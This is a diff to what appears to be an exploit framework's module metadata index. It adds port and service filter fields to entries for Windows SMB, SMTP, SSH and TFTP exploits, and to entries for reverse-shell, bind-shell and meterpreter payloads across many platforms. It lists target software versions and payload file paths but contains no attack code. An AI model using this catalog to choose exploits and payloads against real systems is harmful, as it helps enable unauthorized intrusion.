"Windows 2000 SP4 French", @@ -95169,6 +122613,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows 2000 SP4" ], @@ -95204,6 +122656,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic", "Windows 2000 SP4", @@ -95240,6 +122700,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)", "(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4", @@ -95279,6 +122747,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows XP SP2" ], @@ -95313,6 +122789,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows XP SP2" ], @@ -95347,6 +122831,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic Targetting", "Windows 2000 SP4", @@ -95384,6 +122876,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)", "Windows 2000 Server SP0-SP4+ English", @@ -95431,6 +122931,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic Targeting", "Windows 2000 Universal", @@ -95541,6 +123049,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows Vista SP1/SP2 and Server 2008 (x86)" ], @@ -95578,6 +123094,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -95612,6 +123134,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows Universal" ], @@ -95647,6 +123177,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -95689,6 +123225,12 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 and Server 2008 R2 (x64) All Service Packs" ], @@ -95734,6 +123276,12 @@ "platform": "Windows", "arch": "x64", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "win x64" ], @@ -95777,6 +123325,14 @@ "platform": "Windows", "arch": "x86, x64", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic", "PowerShell", @@ -95821,6 +123377,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows 2000 / Windows XP / Windows 2003" ], @@ -95858,6 +123422,14 @@ "platform": "Windows", "arch": "x86, x64", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic", "PowerShell", @@ -95897,6 +123469,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic" ], @@ -95929,6 +123509,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "DLL", "PSH" @@ -95967,6 +123553,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -96001,6 +123593,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic Targeting" ], @@ -96035,6 +123635,12 @@ "platform": "Windows", "arch": "x86", "rport": 25, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP0 - XP SP1 - EN/FR/GR", "Windows XP SP2 - EN" @@ -96069,6 +123675,12 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mercury Mail Transport System 4.51" ], @@ -96105,6 +123717,12 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Exchange 2000" ], @@ -96139,6 +123757,12 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2/SP3", "Windows Server 2003 SP0", @@ -96174,6 +123798,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -96207,6 +123837,12 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English All", "Windows XP Pro SP0/SP1 English" @@ -96242,6 +123878,18 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Automatic", "Windows 2000 SP0 Italian", @@ -96287,6 +123935,12 @@ "platform": "Windows", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP0-SP4 English", "Windows 2000 SP0-SP4 German", @@ -96327,6 +123981,12 @@ "platform": "Windows", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Freesshd <= 1.2.6 / Windows (Universal)" ], @@ -96360,6 +124020,12 @@ "platform": "Windows", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro SP4 English", "Windows XP Pro SP0 English", @@ -96396,6 +124062,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 English", "Windows XP SP2 English", @@ -96431,6 +124103,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "SecureCRT.exe (3.4.4)" ], @@ -96465,6 +124143,12 @@ "platform": "Windows", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Sysax 5.53 on Win XP SP3 / Win2k3 SP0", "Sysax 5.53 on Win2K3 SP1/SP2" @@ -96500,6 +124184,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4", "Windows 2000 SP3", @@ -96540,6 +124230,12 @@ "platform": "Windows", "arch": "x86", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro SP0/4 English REMOTE", "Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)", @@ -96575,6 +124271,12 @@ "platform": "Windows", "arch": "", "rport": 2380, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English All", "Windows XP Pro SP0/SP1 English" @@ -96610,6 +124312,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows NT SP4 English", @@ -96656,6 +124364,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Distinct TFTP 3.10 on Windows" ], @@ -96690,6 +124404,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 English", "Windows 2000 SP3 English" @@ -96724,6 +124444,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 Pro English ALL", @@ -96762,6 +124488,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "NetDecision 4.2 TFTP on Windows XP SP3 / Windows 2003 SP2" ], @@ -96797,6 +124529,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "OpenTFTP 1.4 Service", "OpenTFTP 1.4 Stand Alone" @@ -96832,6 +124570,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Server 2000", "Windows XP SP2" @@ -96866,6 +124610,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows NT 4.0 SP6a English", @@ -96904,6 +124654,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal - tftpd.exe" ], @@ -96939,6 +124695,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2/SP3 EN Service Mode", "Windows XP SP2/SP3 EN Standalone Mode", @@ -96978,6 +124740,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "3CTftpSvc 2.0.1" ], @@ -97011,6 +124779,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "W2API.DLL TNG 2.3", "Windows 2000 SP0-SP4 English", @@ -97048,6 +124822,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 English", "Windows XP SP2 English", @@ -97083,6 +124863,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 English", "Windows XP SP2 English", @@ -97118,6 +124904,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -97151,6 +124943,21 @@ "platform": "Windows", "arch": "", "rport": 5800, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows NT4 SP3-6", "Windows 2000 SP1-4", @@ -97187,6 +124994,12 @@ "platform": "Windows", "arch": "", "rport": 62514, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "SafeNet Irelke 10.8.0.20", "SafeNet Irelke 10.8.0.10", @@ -97220,6 +125033,24 @@ "platform": "Windows", "arch": "x86, x64", "rport": 5985, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 5985, + 5986 + ], + "autofilter_services": [ + "http", + "https", + "winrm" + ], "targets": [ "Windows" ], @@ -97254,6 +125085,12 @@ "platform": "Windows", "arch": "", "rport": 42, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 English" ], @@ -97285,6 +125122,8 @@ "platform": "All", "arch": "aarch64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-14 18:26:11 +0000", "path": "/modules/nops/aarch64/simple.rb", @@ -97314,6 +125153,8 @@ "platform": "All", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/nops/armle/simple.rb", @@ -97343,6 +125184,8 @@ "platform": "All", "arch": "mipsbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/nops/mipsbe/better.rb", @@ -97372,6 +125215,8 @@ "platform": "All", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/nops/php/generic.rb", @@ -97401,6 +125246,8 @@ "platform": "All", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-08-20 15:53:49 +0000", "path": "/modules/nops/ppc/simple.rb", @@ -97430,6 +125277,8 @@ "platform": "All", "arch": "sparc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-08-27 11:24:38 +0000", "path": "/modules/nops/sparc/random.rb", @@ -97459,6 +125308,8 @@ "platform": "All", "arch": "tty", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/nops/tty/generic.rb", @@ -97488,6 +125339,8 @@ "platform": "All", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/nops/x64/simple.rb", @@ -97518,6 +125371,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/nops/x86/opty2.rb", @@ -97547,6 +125402,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/nops/x86/single_byte.rb", @@ -97576,6 +125433,8 @@ "platform": "AIX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb", @@ -97605,6 +125464,8 @@ "platform": "AIX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/aix/ppc/shell_find_port.rb", @@ -97634,6 +125495,8 @@ "platform": "AIX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/aix/ppc/shell_interact.rb", @@ -97663,6 +125526,8 @@ "platform": "AIX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb", @@ -97695,6 +125560,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/android/reverse_http.rb", @@ -97727,6 +125594,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/android/reverse_https.rb", @@ -97758,6 +125627,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/android/reverse_tcp.rb", @@ -97787,6 +125658,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/android/meterpreter_reverse_http.rb", @@ -97816,6 +125689,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/android/meterpreter_reverse_https.rb", @@ -97845,6 +125720,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/android/meterpreter_reverse_tcp.rb", @@ -97877,6 +125754,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/android/reverse_http.rb", @@ -97909,6 +125788,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/android/reverse_https.rb", @@ -97939,6 +125820,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/android/reverse_tcp.rb", @@ -97970,6 +125853,8 @@ "platform": "Apple_iOS", "arch": "aarch64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb", @@ -98001,6 +125886,8 @@ "platform": "Apple_iOS", "arch": "aarch64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb", @@ -98032,6 +125919,8 @@ "platform": "Apple_iOS", "arch": "aarch64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb", @@ -98061,6 +125950,8 @@ "platform": "Apple_iOS", "arch": "aarch64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-12-19 15:39:29 +0000", "path": "/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb", @@ -98090,6 +125981,8 @@ "platform": "BSD", "arch": "sparc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb", @@ -98119,6 +126012,8 @@ "platform": "BSD", "arch": "sparc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb", @@ -98148,6 +126043,8 @@ "platform": "BSD", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x64/exec.rb", @@ -98177,6 +126074,8 @@ "platform": "BSD", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb", @@ -98207,6 +126106,8 @@ "platform": "BSD", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb", @@ -98236,6 +126137,8 @@ "platform": "BSD", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb", @@ -98265,6 +126168,8 @@ "platform": "BSD", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb", @@ -98295,6 +126200,8 @@ "platform": "BSD", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb", @@ -98324,6 +126231,8 @@ "platform": "BSD", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb", @@ -98355,6 +126264,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x86/exec.rb", @@ -98384,6 +126295,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb", @@ -98413,6 +126326,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb", @@ -98444,6 +126359,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb", @@ -98473,6 +126390,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/bsd/x86/bind_tcp.rb", @@ -98502,6 +126421,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/bsd/x86/find_tag.rb", @@ -98533,6 +126454,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb", @@ -98562,6 +126485,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/bsd/x86/reverse_tcp.rb", @@ -98591,6 +126516,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb", @@ -98622,6 +126549,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb", @@ -98651,6 +126580,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/bsd/x86/shell_find_port.rb", @@ -98680,6 +126611,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x86/shell_find_tag.rb", @@ -98709,6 +126642,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb", @@ -98740,6 +126675,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb", @@ -98769,6 +126706,8 @@ "platform": "BSDi", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/bsdi/x86/bind_tcp.rb", @@ -98798,6 +126737,8 @@ "platform": "BSDi", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb", @@ -98828,6 +126769,8 @@ "platform": "BSDi", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb", @@ -98858,6 +126801,8 @@ "platform": "BSDi", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsdi/x86/shell_find_port.rb", @@ -98888,6 +126833,8 @@ "platform": "BSDi", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb", @@ -98918,6 +126865,8 @@ "platform": "Mainframe", "arch": "cmd", "rport": 21, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb", @@ -98947,6 +126896,8 @@ "platform": "Mainframe", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-29 16:52:36 +0000", "path": "/modules/payloads/singles/cmd/mainframe/bind_shell_jcl.rb", @@ -98976,6 +126927,8 @@ "platform": "Mainframe", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/mainframe/generic_jcl.rb", @@ -99005,6 +126958,8 @@ "platform": "Mainframe", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-29 18:27:29 +0000", "path": "/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb", @@ -99035,6 +126990,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-16 04:06:58 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_awk.rb", @@ -99064,6 +127021,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-01-03 18:43:51 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb", @@ -99093,6 +127052,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_inetd.rb", @@ -99122,6 +127083,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_lua.rb", @@ -99153,6 +127116,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_netcat.rb", @@ -99182,6 +127147,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb", @@ -99211,6 +127178,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb", @@ -99240,6 +127209,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-10-11 11:09:28 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_nodejs.rb", @@ -99270,6 +127241,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_perl.rb", @@ -99300,6 +127273,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 